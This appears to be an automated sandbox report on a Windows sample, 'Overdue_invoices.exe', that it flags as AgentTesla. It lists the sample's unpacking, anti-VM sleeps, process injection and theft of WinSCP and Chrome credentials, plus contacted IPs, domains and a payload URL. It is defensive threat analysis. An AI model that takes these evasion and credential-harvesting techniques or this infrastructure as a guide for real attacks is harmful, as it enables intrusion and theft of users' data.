Source: C:\Users\user\Desktop\Overdue_invoices.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Overdue_invoices.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Overdue_invoices.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs .Net Code: OnResolveAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 0_2_004032DC push 280A0000h; ret 0_2_004032E1
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 1_2_00DB32DC push 280A0000h; ret 1_2_00DB32E1
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Window / User API: threadDelayed 1508 Jump to behavior
Is looking for software installed on the system
Source: C:\Users\user\Desktop\Overdue_invoices.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 2140 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 3492 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99657s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Overdue_invoices.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Overdue_invoices.exe, 00000001.00000002.625516000.0000000001562000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Overdue_invoices.exe, 00000000.00000002.230153111.0000000000B83000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Overdue_invoices.exe Memory written: C:\Users\user\Desktop\Overdue_invoices.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exe Jump to behavior
Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Users\user\Desktop\Overdue_invoices.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Users\user\Desktop\Overdue_invoices.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: Process Memory Space: Overdue_invoices.exe PID: 6020, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Overdue_invoices.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web data Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: Process Memory Space: Overdue_invoices.exe PID: 6020, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 344973 Sample: Overdue_invoices.exe Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 25 Found malware configuration 2->25 27 Malicious sample detected (through community Yara rule) 2->27 29 Multi AV Scanner detection for submitted file 2->29 31 6 other signatures 2->31 6 Overdue_invoices.exe 15 3 2->6         started        process3 dnsIp4 17 193.239.147.103, 49721, 80 DEDIPATH-LLCUS Brunei Darussalam 6->17 15 C:\Users\user\...\Overdue_invoices.exe.log, ASCII 6->15 dropped 33 Injects a PE file into a foreign processes 6->33 11 Overdue_invoices.exe 19 6->11         started        file5 signatures6 process7 dnsIp8 19 raw.githubusercontent.com 11->19 21 icanhazip.com 147.75.47.199, 49734, 80 PACKETUS Switzerland 11->21 23 2 other IPs or domains 11->23 35 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->35 37 Tries to harvest and steal browser information (history, passwords, etc) 11->37 39 Installs a global keyboard hook 11->39 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
193.239.147.103
 unknown Brunei Darussalam
35913 DEDIPATH-LLCUS false
147.75.47.199
 unknown Switzerland
54825 PACKETUS false
151.101.0.133
 unknown United States
54113 FASTLYUS false
108.177.119.109
 unknown United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
github.map.fastly.net 151.101.0.133 true
smtp.gmail.com 108.177.119.109 true
icanhazip.com 147.75.47.199 true
raw.githubusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://icanhazip.com/ false
    		high
    http://193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html false
    • Avira URL Cloud: safe
    		 unknown